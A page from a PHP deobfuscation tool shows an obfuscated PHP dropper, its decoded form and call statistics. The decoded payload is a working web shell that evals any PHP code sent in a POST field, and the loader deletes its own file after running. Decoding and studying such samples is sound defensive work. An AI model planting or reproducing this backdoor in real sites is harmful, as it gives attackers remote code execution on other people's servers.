Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $upl_content = base64_decode('aWYgKGlzc2V0KCRfUE9TVFsienoxIl0pKSB7ZXZhbChzdHJpcHN..
Decoded Output download
if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"]));}
Did this file decode correctly?
Original Code
<?php
$upl_content = base64_decode('aWYgKGlzc2V0KCRfUE9TVFsienoxIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30=');
eval($upl_content);
unlink(__FILE__);
?>
Function Calls
unlink | 1 |
base64_decode | 1 |
Stats
MD5 | 744ab96f0dd993ceb57f66fb94e461d8 |
Eval Count | 1 |
Decode Time | 90 ms |